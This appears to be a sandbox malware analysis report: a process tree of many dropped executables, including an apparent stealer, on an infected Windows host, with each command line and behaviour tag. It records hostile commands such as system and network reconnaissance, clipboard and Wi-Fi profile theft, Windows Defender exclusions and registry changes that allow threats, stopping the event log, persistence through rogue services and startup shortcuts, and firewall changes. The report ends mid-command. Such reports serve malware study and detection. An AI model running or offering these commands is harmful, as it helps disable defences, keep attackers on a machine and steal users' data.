  - - C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe
      "C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1904
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2892
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 300
        5⤵
        Program crash
        
        PID:4536
  - - C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe
      "C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe"
      4⤵
      Executes dropped EXE
      PID:1384
  - - C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe
      "C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe"
      4⤵
      Executes dropped EXE
      PID:4628
  - - C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe
      "C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe"
      4⤵
      Executes dropped EXE
      PID:5084
  - - C:\Users\Admin\AppData\Local\Temp\1000153001\Freshbuild.exe
      "C:\Users\Admin\AppData\Local\Temp\1000153001\Freshbuild.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      PID:4952
    - - C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
        5⤵
        Executes dropped EXE
        
        PID:4124
  - - C:\Users\Admin\AppData\Local\Temp\1000160001\leg222.exe
      "C:\Users\Admin\AppData\Local\Temp\1000160001\leg222.exe"
      4⤵
      PID:1708
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3060
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:2208
      - C:\Users\Admin\AppData\Roaming\UF4TnI21e0.exe
        
        "C:\Users\Admin\AppData\Roaming\UF4TnI21e0.exe"
        6⤵
        
        PID:4692
      - C:\Users\Admin\AppData\Roaming\Le4zcRgCf7.exe
        
        "C:\Users\Admin\AppData\Roaming\Le4zcRgCf7.exe"
        6⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 300
        5⤵
        Program crash
        
        PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\1000161001\build1555.exe
      "C:\Users\Admin\AppData\Local\Temp\1000161001\build1555.exe"
      4⤵
      PID:2152
    - - C:\Users\Admin\AppData\Local\Temp\onefile_2152_133646717331450006\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000161001\build1555.exe"
        5⤵
        
        PID:2300
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:1688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:2612
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:3792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:4104
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:1140
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        6⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:2984
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
        6⤵
        
        PID:2736
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        6⤵
        
        PID:2848
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:1556
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:2376
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:3792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        6⤵
        
        PID:2704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        7⤵
        
        PID:2612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        6⤵
        
        PID:1912
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:948
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        6⤵
        
        PID:2184
        
        C:\Windows\system32\chcp.com
        
        chcp
        7⤵
        
        PID:5084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        6⤵
        
        PID:4552
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:3524
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        7⤵
        
        PID:4436
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        7⤵
        Collects information from the system
        
        PID:2844
        
        C:\Windows\system32\net.exe
        
        net user
        7⤵
        
        PID:4012
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        8⤵
        
        PID:5068
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:3356
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:2852
        
        C:\Windows\system32\net.exe
        
        net localgroup
        7⤵
        
        PID:5028
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        8⤵
        
        PID:4520
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        7⤵
        
        PID:1880
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        8⤵
        
        PID:1144
        
        C:\Windows\system32\net.exe
        
        net user guest
        7⤵
        
        PID:1460
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        8⤵
        
        PID:3088
        
        C:\Windows\system32\net.exe
        
        net user administrator
        7⤵
        
        PID:3060
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        8⤵
        
        PID:1688
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        7⤵
        
        PID:1256
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        7⤵
        Enumerates processes with tasklist
        
        PID:380
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:1148
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        7⤵
        
        PID:2936
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        7⤵
        
        PID:1736
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        7⤵
        Gathers network information
        
        PID:4680
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        7⤵
        Launches sc.exe
        
        PID:2920
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        7⤵
        Modifies Windows Firewall
        
        PID:1052
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        7⤵
        Modifies Windows Firewall
        
        PID:1404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        
        PID:3836
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\1000169001\surfshark.exe
      "C:\Users\Admin\AppData\Local\Temp\1000169001\surfshark.exe"
      4⤵
      PID:4964
- C:\Users\Admin\Documents\SimpleAdobe\XoTwNsBf6DyK0cJTjbNyAFHb.exe
  C:\Users\Admin\Documents\SimpleAdobe\XoTwNsBf6DyK0cJTjbNyAFHb.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:3996
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4812
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGIEBAFHJJDB" & exit
      4⤵
      PID:3232
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:4616
- C:\Users\Admin\Documents\SimpleAdobe\btBha1iWLJAAfPm06u1FnJdr.exe
  C:\Users\Admin\Documents\SimpleAdobe\btBha1iWLJAAfPm06u1FnJdr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4404
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2224
- C:\Users\Admin\Documents\SimpleAdobe\S3cBJoi_jbVaMjU70CLGHd58.exe
  C:\Users\Admin\Documents\SimpleAdobe\S3cBJoi_jbVaMjU70CLGHd58.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2436
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4008
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 280
    3⤵
    - Program crash
    PID:1752
- C:\Users\Admin\Documents\SimpleAdobe\h32813gZm4sl3sJWk820YVDL.exe
  C:\Users\Admin\Documents\SimpleAdobe\h32813gZm4sl3sJWk820YVDL.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1624
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HIEBAKEHDH.exe"
    3⤵
    PID:2188
  - - C:\Users\Admin\AppData\Local\Temp\HIEBAKEHDH.exe
      "C:\Users\Admin\AppData\Local\Temp\HIEBAKEHDH.exe"
      4⤵
      PID:4464
    - - C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"
        5⤵
        
        PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\AAAKEBGDAF.exe"
    3⤵
    PID:4144
- C:\Users\Admin\Documents\SimpleAdobe\oMGhSvT_ptzUPkEcv4UoD4rG.exe
  C:\Users\Admin\Documents\SimpleAdobe\oMGhSvT_ptzUPkEcv4UoD4rG.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k copy Urban Urban.cmd & Urban.cmd & exit
    3⤵
    PID:2404
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:1932
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:2612
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:3328
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 780229
      4⤵
      PID:4832
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "STEADYSIMSCOLLABORATIVEHUMANITIES" Stylus
      4⤵
      PID:2820
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Conservative + Transmission + Employee + Conservation + Coastal + Atlanta 780229\p
      4⤵
      PID:2008
  - - C:\Users\Admin\AppData\Local\Temp\780229\Spec.pif
      780229\Spec.pif 780229\p
      4⤵
      PID:2552
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:2236
- C:\Users\Admin\Documents\SimpleAdobe\SN29AUJGd_9ZE4lgghUQ8j9F.exe
  C:\Users\Admin\Documents\SimpleAdobe\SN29AUJGd_9ZE4lgghUQ8j9F.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4260
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4552
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2180
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1012
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4492
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2872
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:748
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3984
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1508
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3356
- C:\Users\Admin\Documents\SimpleAdobe\B5CdRWBTLXEV2tUJ7kl_iX5x.exe
  C:\Users\Admin\Documents\SimpleAdobe\B5CdRWBTLXEV2tUJ7kl_iX5x.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:8
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1652
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 316
    3⤵
    - Program crash
    PID:2592
- C:\Users\Admin\Documents\SimpleAdobe\WjpRpunGh_dNKP04zkujLrHx.exe
  C:\Users\Admin\Documents\SimpleAdobe\WjpRpunGh_dNKP04zkujLrHx.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Users\Admin\AppData\Local\Temp\7zS214A.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    PID:2072
  - - C:\Users\Admin\AppData\Local\Temp\7zS2C08.tmp\Install.exe
      .\Install.exe /vdidI "385132" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      PID:2468
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:1776
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4492
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bhSAnxpmVrgvBYDGBw" /SC once /ST 16:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS2C08.tmp\Install.exe\" UV /UdidV 385132 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:1056
- C:\Users\Admin\Documents\SimpleAdobe\tgi8pVfXS9AI5LvI0m2WqWHC.exe
  C:\Users\Admin\Documents\SimpleAdobe\tgi8pVfXS9AI5LvI0m2WqWHC.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\pvtqrnvd\
    3⤵
    PID:3988
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lualjyq.exe" C:\Windows\SysWOW64\pvtqrnvd\
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" create pvtqrnvd binPath= "C:\Windows\SysWOW64\pvtqrnvd\lualjyq.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\tgi8pVfXS9AI5LvI0m2WqWHC.exe\"" type= own start= auto DisplayName= "wifi support"
    3⤵
    - Launches sc.exe
    PID:3892
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" description pvtqrnvd "wifi internet conection"
    3⤵
    - Launches sc.exe
    PID:4572
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\System32\sc.exe" start pvtqrnvd
    3⤵
    - Launches sc.exe
    PID:1132
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2808
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 588
    3⤵
    - Program crash
    PID:456
- C:\Users\Admin\Documents\SimpleAdobe\WBHNbUpROOexfglNpj6JGo1P.exe
  C:\Users\Admin\Documents\SimpleAdobe\WBHNbUpROOexfglNpj6JGo1P.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:1208
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1144
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 2088
      4⤵
      Program crash
      PID:4940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2436 -ip 2436
1⤵
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 8 -ip 8
1⤵
PID:3388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1904 -ip 1904
1⤵
PID:2704

C:\Windows\SysWOW64\pvtqrnvd\lualjyq.exe
C:\Windows\SysWOW64\pvtqrnvd\lualjyq.exe /d"C:\Users\Admin\Documents\SimpleAdobe\tgi8pVfXS9AI5LvI0m2WqWHC.exe"
1⤵
- Executes dropped EXE
PID:2560
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:2272
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 552
  2⤵
  - Program crash
  PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3620 -ip 3620
1⤵
PID:3624

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url" & echo URL="C:\Users\Admin\AppData\Local\VitaConnect Innovations\VitaLink.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VitaLink.url" & exit
1⤵
PID:1612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2560 -ip 2560
1⤵
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1708 -ip 1708
1⤵
PID:1440

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
PID:4792
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1736
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1524
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1392
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2772
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3388
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1144 -ip 1144
1⤵
PID:1860

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
PID:2748

C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe om /ldidVUd 525403 /S
1⤵
PID:4472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG 